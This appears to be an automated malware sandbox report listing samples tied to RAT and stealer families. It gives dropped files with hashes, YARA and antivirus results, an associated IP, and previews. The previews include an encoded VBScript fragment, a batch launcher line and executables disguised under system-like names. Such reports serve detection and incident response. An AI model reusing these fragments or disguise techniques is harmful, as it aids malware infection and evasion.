c12f54a3f91dc7bafd92cb59fe009a35 | VgbVS3yBhI.exe | Get hash | malicious | Neshta, XWorm | Browse | 176.123.168.151
c12f54a3f91dc7bafd92cb59fe009a35 | J7tu5vP0fA.exe | Get hash | malicious | Neshta, XWorm | Browse | 176.123.168.151
c12f54a3f91dc7bafd92cb59fe009a35 | NECOv1fTXe.exe | Get hash | malicious | Neshta, XWorm | Browse | 176.123.168.151
c12f54a3f91dc7bafd92cb59fe009a35 | ZvZ746X318.exe | Get hash | malicious | Neshta, XWorm | Browse | 176.123.168.151
c12f54a3f91dc7bafd92cb59fe009a35 | PdMBQWIwWE.exe | Get hash | malicious | AsyncRAT, Neshta, VenomRAT | Browse | 176.123.168.151
c12f54a3f91dc7bafd92cb59fe009a35 | xdNhIDAiy6.exe | Get hash | malicious | Neshta | Browse | 176.123.168.151
c12f54a3f91dc7bafd92cb59fe009a35 | ELq1Ghub8k.exe | Get hash | malicious | AsyncRAT, Neshta, VenomRAT | Browse | 176.123.168.151
c12f54a3f91dc7bafd92cb59fe009a35 | l1aiKGBq3S.exe | Get hash | malicious | Neshta, XWorm | Browse | 176.123.168.151
c12f54a3f91dc7bafd92cb59fe009a35 | JaTAKnq6PL.exe | Get hash | malicious | Neshta, XWorm | Browse | 176.123.168.151

Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
C:\Users\user\Desktop\IkSFhrpY.log | hfGA6tjyxY.exe | Get hash | malicious | DCRat, PureLog Stealer, zgRAT | Browse |
C:\Users\user\Desktop\IkSFhrpY.log | 3m7cmtctck.exe | Get hash | malicious | PureLog Stealer, zgRAT | Browse |
C:\Users\user\Desktop\IkSFhrpY.log | jXtV6KO1A7.exe | Get hash | malicious | DCRat, PureLog Stealer, zgRAT | Browse |
C:\Users\user\Desktop\IkSFhrpY.log | fDTPlvsGfH.exe | Get hash | malicious | DCRat | Browse |
C:\Users\user\Desktop\IkSFhrpY.log | W4tW72sfAD.exe | Get hash | malicious | DCRat, PureLog Stealer, zgRAT | Browse |
C:\Users\user\Desktop\IkSFhrpY.log | 8CDSiIApNr.exe | Get hash | malicious | DCRat, PureLog Stealer, zgRAT | Browse |
C:\Users\user\Desktop\IkSFhrpY.log | 3otr19d5Oq.exe | Get hash | malicious | DCRat, PureLog Stealer, zgRAT | Browse |
C:\Users\user\Desktop\IkSFhrpY.log | idYLOQOVSi.exe | Get hash | malicious | DCRat | Browse |
C:\Users\user\Desktop\IkSFhrpY.log | ZAF4Dsu737.exe | Get hash | malicious | DCRat, PureLog Stealer, zgRAT | Browse |
C:\Users\user\Desktop\IkSFhrpY.log | mbsPX9l9Ge.exe | Get hash | malicious | DCRat, PureLog Stealer, zgRAT | Browse |
                                                      Process:C:\Users\user\AppData\Local\Temp\GargantuaN.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):202
                                                      Entropy (8bit):5.811991669101916
                                                      Encrypted:false
                                                      SSDEEP:6:GowqK+NkLzWbH9WF08nZNDd3RL1wQJRWrP3Vmz71:GpMCzWL74d3XBJxX1
                                                      MD5:E58F54961290891BA8DD349131192542
                                                      SHA1:E95EE8B62C8ED496FCC87CF0BAE3290392A4196E
                                                      SHA-256:9B129787A354C2400B13F6A3ADC4B22BB4EFE21B88E1A04E7E5DC6D093E421A8
                                                      SHA-512:5914AF838FA227A64705EF2AFBBC10B19A66D121E177EED8215A69F05CDFE7406AC8CF87897607E337A8E13B66A6D1ED091B2AA6B841E264A935E9A7BACA21FE
                                                      Malicious:true
                                                      Antivirus:
                                                      • Antivirus: Avira, Detection: 100%
                                                      Preview:#@~^sQAAAA==j.Y~q/4?t.V^~',Z.+mYn6(L+1O`r.?1.rwDRUtnVsE*@#@&.U^DbwO UV+n2v*T!Zb@#@&j.Y,./4?4nV^PxP;DnCD+r(%+1Y`r.jmMkaY ?4n^VE#@#@&.ktj4.VV ]!x~J;lJnnM0GVVJz7-3.N-:Uj\qWLkz"mc4lDESPZ~,0CVdn1zcAAA==^#~@.
                                                      Process:C:\Users\user\AppData\Local\Temp\GargantuaN.exe
                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):1968128
                                                      Entropy (8bit):7.554175262094728
                                                      Encrypted:false
                                                      SSDEEP:24576:wR5wlxvspUb0qtT2YSCeBJxs56NAFUhOcfMxHoktN/c61+bURfTj/PlzBCpEwxl5:wUPKCeJxkBceok7WURfTj/j9wDmm
                                                      MD5:3997D7D058AF3C1B6C9ABB57F6FA1F2A
                                                      SHA1:CD38C3EB67E2D09445EB39B66A69B31673C2360C
                                                      SHA-256:B19C5E3261D05C95756D6452048448C4AB30D3179F90CA714DE39ECE0CD72D99
                                                      SHA-512:AD53432C8F8309701E0DC2BA7C885F5088EE69C3073E9D1DE4A3C75CB3C1AF845B43D0A8512AF58BCD425A831EC4F4BCF74FE3918956527DB5A96A88FC003A36
                                                      Malicious:true
                                                      Yara Hits:
                                                      • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\PerfDll\hyperProviderSavesinto.exe, Author: Joe Security
                                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\PerfDll\hyperProviderSavesinto.exe, Author: Joe Security
                                                      Antivirus:
                                                      • Antivirus: Avira, Detection: 100%
                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                      • Antivirus: ReversingLabs, Detection: 88%
                                                      • Antivirus: Virustotal, Detection: 74%, Browse
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..e................................. ... ....@.. .......................`............@.....................................K.... ..p....................@....................................................... ............... ..H............text...$.... ...................... ..`.rsrc...p.... ......................@....reloc.......@......................@..B........................H...........<.......s......p@..I........................................0..........(.... ........8........E....N...*...).......8I...(.... ....~u...{|...:....& ....8....*(.... ....~u...{....:....& ....8....(.... ....8........0.......... ........8........E............S...........8)...~....:.... ....~u...{....9....& ....8.......... ....~u...{....:....& ....8....~....(H... .... .... ....s....~....(L....... ....8^...r...ps....z*....~....(P...~....(T... ....?.... ....8&.....(....*
                                                      Process:C:\Users\user\AppData\Local\Temp\GargantuaN.exe
                                                      File Type:ASCII text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):87
                                                      Entropy (8bit):5.275499456592444
                                                      Encrypted:false
                                                      SSDEEP:3:oHQzAqPmIJJG8OrAXIrXul/10OA:kQsfIHGBUYrXC/1BA
                                                      MD5:B23A11797069052E51F71DDF9BCFC4F2
                                                      SHA1:08C3C1D85CB102A92843C2ED82CCCDD8CA26026D
                                                      SHA-256:E026F1D8CED262BF0921EBC7BBC797AA65F3E6E2AD8A62B9F4566CC4AA540A43
                                                      SHA-512:E8C8EF9EF32A415567E27EB467A992868FB836A52CE0F74348CFC3A590BFA3B5E4AC4E37725D0C2B572EEBB42F6BA33DDCB7B513359C6392B71914B7BF03BA26
                                                      Malicious:false
                                                      Preview:%XUeuqrfVNITzMR%%BhrujCqtlkrcOI%..%CWLwux%"C:\PerfDll/hyperProviderSavesinto.exe"%kZbJ%
                                                      Process:C:\PerfDll\hyperProviderSavesinto.exe
                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):1968128
                                                      Entropy (8bit):7.554175262094728
                                                      Encrypted:false
                                                      SSDEEP:24576:wR5wlxvspUb0qtT2YSCeBJxs56NAFUhOcfMxHoktN/c61+bURfTj/PlzBCpEwxl5:wUPKCeJxkBceok7WURfTj/j9wDmm
                                                      MD5:3997D7D058AF3C1B6C9ABB57F6FA1F2A
                                                      SHA1:CD38C3EB67E2D09445EB39B66A69B31673C2360C
                                                      SHA-256:B19C5E3261D05C95756D6452048448C4AB30D3179F90CA714DE39ECE0CD72D99
                                                      SHA-512:AD53432C8F8309701E0DC2BA7C885F5088EE69C3073E9D1DE4A3C75CB3C1AF845B43D0A8512AF58BCD425A831EC4F4BCF74FE3918956527DB5A96A88FC003A36
                                                      Malicious:true
                                                      Yara Hits:
                                                      • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe, Author: Joe Security
                                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe, Author: Joe Security
                                                      Antivirus:
                                                      • Antivirus: Avira, Detection: 100%
                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                      • Antivirus: ReversingLabs, Detection: 88%
                                                      • Antivirus: Virustotal, Detection: 74%, Browse
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..e................................. ... ....@.. .......................`............@.....................................K.... ..p....................@....................................................... ............... ..H............text...$.... ...................... ..`.rsrc...p.... ......................@....reloc.......@......................@..B........................H...........<.......s......p@..I........................................0..........(.... ........8........E....N...*...).......8I...(.... ....~u...{|...:....& ....8....*(.... ....~u...{....:....& ....8....(.... ....8........0.......... ........8........E............S...........8)...~....:.... ....~u...{....9....& ....8.......... ....~u...{....:....& ....8....~....(H... .... .... ....s....~....(L....... ....8^...r...ps....z*....~....(P...~....(T... ....?.... ....8&.....(....*
                                                      Process:C:\PerfDll\hyperProviderSavesinto.exe
                                                      File Type:ASCII text, with very long lines (372), with no line terminators
                                                      Category:dropped
                                                      Size (bytes):372
                                                      Entropy (8bit):5.8403681581324705
                                                      Encrypted:false
                                                      SSDEEP:6:Rtl3vcN87w3UMBTqc+pQdhEZ3JIBh6b5gkKyYl8aHYfykiCSoEfYH5n:RTcN87m7Vqc0Qdhm36Bcb5gkKa3fRUk5
                                                      MD5:2FBD38F1B2C42F8FDA17DE88950BAEEA
                                                      SHA1:16420569F041ADAF0A8A666EE5F02E71E9115B78
                                                      SHA-256:5AD54B6BAB2D4B20373FC46B8447FDDCE47D0C0DD51B24340054E7CCDD511B1E
                                                      SHA-512:33F00E682FF99CE15C590F81945368E34ED7F0348429C2F44F32B7BF4D77ABAD6B4DB41351873FBACC6DC884B8087C3DDC4A82107E94DA01557EB2D15761E56B
                                                      Malicious:false
                                                      Preview:qavOs2MXQUSot5jZ0LiOzlCGbBxN19Z9fjzCOzrb41jlHGPeb5kZGYhEXpwrF8fR4TJJGhKAdHT8Bb9UvSw5ZA3HCuojCAV6WSqy7FY3vj59FiD6pc5xLj24ZBGW3k8dwWmtvKWq43K0E4Cdrr3kEiuwZvY58CAKkbMs6TLfFP2SYBzf9noLqYZNmzT9wbr22APmrUgXgYeypbXY526VXyeMC8FH9LsoiAZYwNypGRpR3kiLc5D3eVeEgDjsOZYUp0QpB8msEQPGIMTca4pEIzJMfV2tnFbq3UlDT2JdTUzOGY5TuHRTuTL0qEKqF2F8ziMykPJiuLuxA5GGZi9fyH6jIvWOsdXaP0YhLHte8tjijY0v8DQh
                                                      Process:C:\Users\user\AppData\Local\Temp\GargantuanS.exe
                                                      File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):5475840
                                                      Entropy (8bit):6.521499958209298
                                                      Encrypted:false
                                                      SSDEEP:98304:v1ECDUbTBOrBu3mhZvUvpldnwq4b17j1EQ/AVEkteJ5ymz6vZL50Xpa:vVUgBu3sUPdob17GQfk45ymGvZt
                                                      MD5:7A568EF3F46D369F3D3FFD68FDF68573
                                                      SHA1:203042A80812E2208C45AA95900172550994D80D
                                                      SHA-256:BB895B0D8E684A48F0E9564B9D7E1323087D4F4664DA134A28A54338BFAB4EA0
                                                      SHA-512:4F08CDD7021BD9AC1922D1252DBF7A2F26C689574FDA7C5A0EAC7DDC1F1138F3A51770B23F5EA23458611851E410FAF5468A7209437E354452C47C13F2BB3ECD
                                                      Malicious:true
                                                      Antivirus:
                                                      • Antivirus: Avira, Detection: 100%
                                                      • Antivirus: ReversingLabs, Detection: 81%
                                                      • Antivirus: Virustotal, Detection: 61%, Browse
                                                      Preview:MZx.....................@...................................x...hr......!..L.!This program cannot be run in DOS mode.$..PE..d.....e.........."...........R.....@..........@..............................T...........`.....................................................<.....S.P.....S...............S.x...............................(.......8...........X...x............................text............................... ..`.rdata...'.......(..................@..@.data....R.......R.................@....pdata........S.......S.............@..@.00cfg........S.......S.............@..@.tls..........S.......S.............@....rsrc...P.....S.......S.............@..@.reloc..x.....S.......S.............@..B........................................................................................................................................................................................................................................................................................................
                                                      Process:C:\PerfDll\hyperProviderSavesinto.exe
                                                      File Type:ASCII text, with very long lines (614), with no line terminators
                                                      Category:dropped
                                                      Size (bytes):614
                                                      Entropy (8bit):5.869847775662665
                                                      Encrypted:false
                                                      SSDEEP:12:Nv3kTqjP4+ICeVpJRNYeskT6fr/8Nr2c7gn/umSjt/5fhziUtx65tG16dEa:F3k+HI5fNYIe62Wg/umSR/+ux65aLa
                                                      MD5:19CBF5DB2E33EA2352F8D7F174EC29FA
                                                      SHA1:77DF3CEE51970122409E18B22D78CA9D67DA7697
                                                      SHA-256:F718A294F9B10D4F09ACE961A311CFFE5C6CEF5A68E293EA938ECC3664484143
                                                      SHA-512:DAE739E10036B4F8DE417BAA78D18876778DCF56FB1460497B0D167F86835EFA4F0CEF61CDA40B8519F7DCC93E3992A688401AD4DAEAE9D2BC166ABB75767251
                                                      Malicious:false
                                                       Preview:
                                                      Process:C:\PerfDll\hyperProviderSavesinto.exe
                                                      File Type:ASCII text, with very long lines (553), with no line terminators
                                                      Category:dropped
                                                      Size (bytes):553
                                                      Entropy (8bit):5.893036491694996
                                                      Encrypted:false
                                                      SSDEEP:12:60OyjJ+8unPIn+VzJzs5ZQexwtiV0jBVkUukEHoS:60OyjA8unPI+Ve5qex7C8FkEIS
                                                      MD5:4521F42FB8C267F3E475D816413D0BD2
                                                      SHA1:B1D346E3CF33D84960E119706D5C6E28BF84F243
                                                      SHA-256:B135560624CB2C1A7AB33D3B630F7D4E988880DD09353FEDADD3627A05F29B27
                                                      SHA-512:91EB17B0F0A676FAC40D671FF6F785534FC4284DBDA4E30D4155B91CE0BA6C1BD6BC01E34C40AF79E27D1EF151CF5D5BEA9C8488E9D80A0BDD4D0965928D104C
                                                      Malicious:false
                                                      Preview:Y9u4lQoM0gpqq5ic4kE4RtPzrOaJ8rYCGKNn44SnKE8x2czmWz44dKQou5MW0fOIInkgs4i9SatNvc6OYxwJxei54i39r6xo0zpP2T3bR4mCaC3S887CsEVnEomJBjSWnEX5wrWF3V221gf1pkAt8u6veBKOruasmQZWp7fQm2IXMdviJueaijX3ImbvhIXJ4KQlGIMrFuHGliiAPlE6PAJD2gODfttee9dCMKbAixUxbRRjDaf5Da43AMsk4ILVAnlmEgyFJEYbqVllOo9ENyaEEjC9b1FZl8xyppehmav9CcNolHWQJGHMMhhedyoS880riw6jJccxCbBmWXYTezQe0lmHH9DyvdADmfFzKwHqoUKuf5IGZUxJsV07KybJZnBjb8A1SiIssjzga1mM17Ybp1UQoIpWV7RBSkTh5Qy0LFbIfUgSLPRbOk3jntMJ3wWuSyO0iFRlJiPjaMvUlWKGqzxrrt3LEo7Zsq0rFquG7qSqVUJb81hglQDcBgIyLGgekz0tWEO5mDI9hGVWkcNMGaybnXpjh551JxFgd
                                                      Process:C:\PerfDll\hyperProviderSavesinto.exe
                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):1968128
                                                      Entropy (8bit):7.554175262094728
                                                      Encrypted:false
                                                      SSDEEP:24576:wR5wlxvspUb0qtT2YSCeBJxs56NAFUhOcfMxHoktN/c61+bURfTj/PlzBCpEwxl5:wUPKCeJxkBceok7WURfTj/j9wDmm
                                                      MD5:3997D7D058AF3C1B6C9ABB57F6FA1F2A
                                                      SHA1:CD38C3EB67E2D09445EB39B66A69B31673C2360C
                                                      SHA-256:B19C5E3261D05C95756D6452048448C4AB30D3179F90CA714DE39ECE0CD72D99
                                                      SHA-512:AD53432C8F8309701E0DC2BA7C885F5088EE69C3073E9D1DE4A3C75CB3C1AF845B43D0A8512AF58BCD425A831EC4F4BCF74FE3918956527DB5A96A88FC003A36
                                                      Malicious:true
                                                      Yara Hits:
                                                      • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Recovery\RuntimeBroker.exe, Author: Joe Security
                                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Recovery\RuntimeBroker.exe, Author: Joe Security
                                                      Antivirus:
                                                      • Antivirus: Avira, Detection: 100%
                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                      • Antivirus: ReversingLabs, Detection: 88%
                                                      • Antivirus: Virustotal, Detection: 74%, Browse
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..e................................. ... ....@.. .......................`............@.....................................K.... ..p....................@....................................................... ............... ..H............text...$.... ...................... ..`.rsrc...p.... ......................@....reloc.......@......................@..B........................H...........<.......s......p@..I........................................0..........(.... ........8........E....N...*...).......8I...(.... ....~u...{|...:....& ....8....*(.... ....~u...{....:....& ....8....(.... ....8........0.......... ........8........E............S...........8)...~....:.... ....~u...{....9....& ....8.......... ....~u...{....:....& ....8....~....(H... .... .... ....s....~....(L....... ....8^...r...ps....z*....~....(P...~....(T... ....?.... ....8&.....(....*
                                                      Process:C:\PerfDll\hyperProviderSavesinto.exe
                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):1968128
                                                      Entropy (8bit):7.554175262094728
                                                      Encrypted:false
                                                      SSDEEP:24576:wR5wlxvspUb0qtT2YSCeBJxs56NAFUhOcfMxHoktN/c61+bURfTj/PlzBCpEwxl5:wUPKCeJxkBceok7WURfTj/j9wDmm
                                                      MD5:3997D7D058AF3C1B6C9ABB57F6FA1F2A
                                                      SHA1:CD38C3EB67E2D09445EB39B66A69B31673C2360C
                                                      SHA-256:B19C5E3261D05C95756D6452048448C4AB30D3179F90CA714DE39ECE0CD72D99
                                                      SHA-512:AD53432C8F8309701E0DC2BA7C885F5088EE69C3073E9D1DE4A3C75CB3C1AF845B43D0A8512AF58BCD425A831EC4F4BCF74FE3918956527DB5A96A88FC003A36
                                                      Malicious:true
                                                      Yara Hits:
                                                      • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Recovery\WmiPrvSE.exe, Author: Joe Security
                                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Recovery\WmiPrvSE.exe, Author: Joe Security
                                                      Antivirus:
                                                      • Antivirus: Avira, Detection: 100%
                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                      • Antivirus: ReversingLabs, Detection: 88%
                                                      • Antivirus: Virustotal, Detection: 74%, Browse
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..e................................. ... ....@.. .......................`............@.....................................K.... ..p....................@....................................................... ............... ..H............text...$.... ...................... ..`.rsrc...p.... ......................@....reloc.......@......................@..B........................H...........<.......s......p@..I........................................0..........(.... ........8........E....N...*...).......8I...(.... ....~u...{|...:....& ....8....*(.... ....~u...{....:....& ....8....(.... ....8........0.......... ........8........E............S...........8)...~....:.... ....~u...{....9....& ....8.......... ....~u...{....:....& ....8....~....(H... .... .... ....s....~....(L....... ....8^...r...ps....z*....~....(P...~....(T... ....?.... ....8&.....(....*
                                                      Process:C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe
                                                      File Type:CSV text
                                                      Category:dropped
                                                      Size (bytes):847
                                                      Entropy (8bit):5.354334472896228
                                                      Encrypted:false
                                                      SSDEEP:24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQwYHKGSI6oPtHTHhAHKKkb
                                                      MD5:9F9FA9EFE67E9BBD165432FA39813EEA
                                                      SHA1:6FE9587FB8B6D9FE9FA9ADE987CB8112C294247A
                                                      SHA-256:4488EA75E0AC1E2DEB4B7FC35D304CAED2F877A7FB4CC6B8755AE13D709CF37B
                                                      SHA-512:F4666179D760D32871DDF54700D6B283AD8DA82FA6B867A214557CBAB757F74ACDFCAD824FB188005C0CEF3B05BF2352B9CA51B2C55AECF762468BB8F5560DB3
                                                      Malicious:false
                                                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..
                                                      Process:C:\PerfDll\hyperProviderSavesinto.exe
                                                      File Type:ASCII text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):1830
                                                      Entropy (8bit):5.3661116947161815
                                                      Encrypted:false
                                                      SSDEEP:48:MxHKQwYHKGSI6oPtHTHhAHKKkrJHV1qHGIs0HKGHKlT4vHNpv:iqbYqGSI6oPtzHeqKkt1wmj0qGqZ4vtd
                                                      MD5:F3475F6FF1F713C7C9DAACC1DF623E58
                                                      SHA1:AED39B5923CCC56514F33B73DF64A13706CE0DAE
                                                      SHA-256:3AE4E8E8ADBD758B6E39EA3D7B8E680F3160F6E5D48DAF1F0419236F1978CDCE
                                                      SHA-512:65B0309ABFBEFD2A749F3DEDBEE74CF5160BF42049C8A67AE30DB786092EC3553F1C8F16C5C40004650CB3926C84F061E37C796CA92266F582B3E48D5A237C32
                                                      Malicious:false
                                                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..2,"System.Security, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyT
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):64
                                                      Entropy (8bit):1.1940658735648508
                                                      Encrypted:false
                                                      SSDEEP:3:NlllulJnp/p:NllU
                                                      MD5:BC6DB77EB243BF62DC31267706650173
                                                      SHA1:9E42FEFC2E92DE0DB2A2C9911C866320E41B30FF
                                                      SHA-256:5B000939E436B6D314E3262887D8DB6E489A0DDF1E10E5D3D80F55AA25C9FC27
                                                      SHA-512:91DC4935874ECA2A4C8DE303D83081FE945C590208BB844324D1E0C88068495E30AAE2321B3BA8A762BA08DAAEB75D9931522A47C5317766C27E6CE7D04BEEA9
                                                      Malicious:false
                                                      Preview:@...e.................................X..............@..........
                                                      Process:C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe
                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):2289873
                                                      Entropy (8bit):7.491711964173027
                                                      Encrypted:false
                                                      SSDEEP:24576:2TbBv5rUyXVIR5wlxvspUb0qtT2YSCeBJxs56NAFUhOcfMxHoktN/c61+bURfTjR:IBJIUPKCeJxkBceok7WURfTj/j9wDmm4
                                                      MD5:B3CEE15E9FDDC0E7DC33069319B549D6
                                                      SHA1:1FF4EF47BA8A0DE9F65EAA389B11D662AEC318DE
                                                      SHA-256:AF6A8E7175A702F8AF26ED414DD0FBF1708F7716EFB33792594149EF12D2431C
                                                      SHA-512:CA402D334E8C7D6DC3FAB0A129C56EF8ED3228B75C7B5BC5B0E5A174B199D37583395CC52D241CAF583ABA46DF388F46E728BCC264F25312F62929AC932809D0
                                                      Malicious:true
                                                      Yara Hits:
                                                      • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exe, Author: Joe Security
                                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exe, Author: Joe Security
                                                      Antivirus:
                                                      • Antivirus: Avira, Detection: 100%
                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                      • Antivirus: ReversingLabs, Detection: 53%
                                                      • Antivirus: Virustotal, Detection: 53%
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......x_c.<>..<>..<>......1>.......>......$>...I.>>...I../>...I..+>...I...>..5F..7>..5F..;>..<>..)?...I...>...I..=>...I.=>...I..=>..Rich<>..........PE..L..... b............................0........0....@..........................P............@.........................p...4.......P....@....................... ..<#......T............................U..@............0..x....... ....................text............................... ..`.rdata.......0....... ..............@..@.data... G..........................@....didat.......0......................@....rsrc........@......................@..@.reloc..<#... ...$..................@..B................................................................................................................................................................................................................................................
                                                      Process:C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe
                                                      File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):5475840
                                                      Entropy (8bit):6.521499958209298
                                                      Encrypted:false
                                                      SSDEEP:98304:v1ECDUbTBOrBu3mhZvUvpldnwq4b17j1EQ/AVEkteJ5ymz6vZL50Xpa:vVUgBu3sUPdob17GQfk45ymGvZt
                                                      MD5:7A568EF3F46D369F3D3FFD68FDF68573
                                                      SHA1:203042A80812E2208C45AA95900172550994D80D
                                                      SHA-256:BB895B0D8E684A48F0E9564B9D7E1323087D4F4664DA134A28A54338BFAB4EA0
                                                      SHA-512:4F08CDD7021BD9AC1922D1252DBF7A2F26C689574FDA7C5A0EAC7DDC1F1138F3A51770B23F5EA23458611851E410FAF5468A7209437E354452C47C13F2BB3ECD
                                                      Malicious:true
                                                      Antivirus:
                                                      • Antivirus: Avira, Detection: 100%
                                                      • Antivirus: ReversingLabs, Detection: 81%
                                                      • Antivirus: Virustotal, Detection: 61%
                                                      Preview:MZx.....................@...................................x...hr......!..L.!This program cannot be run in DOS mode.$..PE..d.....e.........."...........R.....@..........@..............................T...........`.....................................................<.....S.P.....S...............S.x...............................(.......8...........X...x............................text............................... ..`.rdata...'.......(..................@..@.data....R.......R.................@....pdata........S.......S.............@..@.00cfg........S.......S.............@..@.tls..........S.......S.............@....rsrc...P.....S.......S.............@..@.reloc..x.....S.......S.............@..B........................................................................................................................................................................................................................................................................................................
                                                      Process:C:\PerfDll\hyperProviderSavesinto.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):25
                                                      Entropy (8bit):4.293660689688185
                                                      Encrypted:false
                                                      SSDEEP:3:N6UWEu+0EAn:N/DuTEA
                                                      MD5:383DFC1B708DABB1113ABA4A4E02C81E
                                                      SHA1:4E1363C0CE2383964530043559CCEAEC6FD4DC18
                                                      SHA-256:CBA3C2487A99506E55707BA678F8045EDC328A215359E5EF813DAB3FAFC50ED6
                                                      SHA-512:C302F006BB94D037F1A90A60368D0F69837391CAA997438CB832F7DA4810BDFBC49BAA8375C22245D34802FD2E19451C21D210687E5A26E73173DD7F8F0874A7
                                                      Malicious:false
                                                      Preview:4041WlTFc13aoPD6aOHV1NAQe
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                      Process:C:\PerfDll\hyperProviderSavesinto.exe
                                                      File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):176
                                                      Entropy (8bit):5.247378044845812
                                                      Encrypted:false
